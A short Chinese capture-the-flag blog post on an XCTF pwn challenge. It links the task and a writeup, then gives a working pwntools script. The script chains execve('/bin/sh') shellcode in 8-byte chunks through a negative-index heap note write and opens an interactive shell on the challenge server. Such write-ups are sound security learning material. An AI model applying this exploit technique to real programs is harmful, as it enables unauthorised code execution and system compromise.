新接触的一道题,新题型。。
https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=1&id=4611&page=1
Writeup: https://adworld.xctf.org.cn/media/uploads/writeup/ee65882803c511ea9f5700163e004e93.pdf
开眼23333。。。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 | from pwn import * from LibcSearcher import * context.log_level="debug" context(arch="amd64",os="linux") def create(p,index,size,content): p.sendlineafter("your choice>> ","1") p.sendlineafter("index:",str(index)) p.sendlineafter("size:",str(size)) p.sendafter("content:",content) def delete(p,index): p.sendlineafter("your choice>> ","4") p.sendlineafter("index:",str(index)) p = remote("111.198.29.45",34191) #p = process("./1") ASM = [] ASM.append(asm("xor rax,rax") + b"\x90\x90\xeb\x19") ASM.append(asm("mov eax,0x3b") + b"\xeb\x19") ASM.append(asm("xor rsi,rsi") + b"\x90\x90\xeb\x19") ASM.append(asm("xor rdx,rdx") + b"\x90\x90\xeb\x19") ASM.append(asm("syscall") + b"\x90\x90\x90\x90\x90") for i in range(0,5): create(p,i,8,ASM[i]) delete(p,0) create(p,-8,8,ASM[0]) p.sendlineafter("your choice>> ","/bin/sh") p.interactive() |
附上i64db:
1f10c9df3d784b5ba04b205c1610a11e